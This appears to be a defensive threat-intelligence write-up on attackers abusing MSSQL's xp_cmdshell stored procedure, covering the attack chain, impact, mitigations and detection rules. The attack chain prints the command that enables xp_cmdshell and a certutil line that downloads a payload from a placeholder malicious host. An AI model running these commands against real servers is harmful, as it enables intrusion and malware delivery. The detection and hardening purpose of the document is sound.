MSSQL xp_cmdshell Stored Procedure Abuse for Persistence and Execution
Attackers leverage the MSSQL xp_cmdshell stored procedure to execute arbitrary commands, escalating privileges and establishing persistence on Windows systems.
Attackers are increasingly targeting MSSQL servers to gain unauthorized access and establish persistence within compromised networks. A common technique involves abusing the xp_cmdshell extended stored procedure, a feature that allows executing operating system commands directly from within SQL Server. This procedure is disabled by default, but when enabled, it runs with the security context of the MSSQL Server service account, which often possesses elevated privileges. Once enabled, attackers can leverage xp_cmdshell to execute malicious commands, download and execute malware, create rogue user accounts, or exfiltrate sensitive data. This activity can lead to full system compromise and significant data breaches, particularly if the SQL Server has access to critical databases or network resources. Defenders should monitor for attempts to enable and utilize xp_cmdshell, as well as unusual process execution originating from the sqlservr.exe process.
Attack Chain
- Initial access to the MSSQL server is gained, possibly through credential stuffing or exploiting SQL injection vulnerabilities.
- The attacker attempts to enable the
xp_cmdshellstored procedure usingsp_configure 'xp_cmdshell', 1; RECONFIGURE;. - The attacker uses
xp_cmdshellto execute reconnaissance commands such aswhoamiornet userto gather information about the system and user privileges. xp_cmdshellis then used to download a malicious payload (e.g., a reverse shell or malware installer) usingcertutil.exe -urlcache -f http://malicious.example.com/payload.exe payload.exe.- The downloaded payload is executed via
xp_cmdshell, establishing a foothold on the system. - The attacker leverages the compromised system to perform lateral movement within the network, potentially using tools like
bitsadmin.exe. - Persistence is established by creating a scheduled task or modifying the registry using
xp_cmdshellto execute a malicious script at regular intervals. - Data exfiltration or other malicious activities are performed, depending on the attacker's objectives.
Impact
Successful exploitation of xp_cmdshell can lead to complete compromise of the SQL Server and the underlying operating system. This allows attackers to steal sensitive data, install ransomware, or use the compromised server as a pivot point for further attacks within the network. Organizations in various sectors have been targeted, including those in finance, healthcare, and government. The consequences of a successful attack can include significant financial losses, reputational damage, and legal liabilities.
Recommendation
- Monitor for process creation events where
process.parent.nameissqlservr.exeandprocess.nameiscmd.exe,powershell.exe,certutil.exe, orbitsadmin.exe, as outlined in the provided rule, to detect potentialxp_cmdshellabuse. - Implement the Sigma rule "Execution via MSSQL xp_cmdshell Stored Procedure" to detect suspicious command execution via
xp_cmdshell. - Disable the
xp_cmdshellstored procedure unless absolutely necessary, and implement strict access controls if it must be enabled. - Review and harden MSSQL server configurations to prevent unauthorized access and privilege escalation, referencing best practices from Microsoft and security organizations.
- Enable and monitor Windows Security Event Logs, Sysmon, or other endpoint detection and response (EDR) solutions to gain visibility into process execution and other system activities.
Detection coverage 2
Detect xp_cmdshell Usage with Suspicious Process
highDetects the execution of command interpreters (cmd.exe, powershell.exe) as child processes of sqlservr.exe via xp_cmdshell.
Detect CertUtil Download via xp_cmdshell
mediumDetects the use of certutil.exe to download files when spawned by sqlservr.exe, indicative of xp_cmdshell abuse.
Detection queries are available on the platform. Get full rules →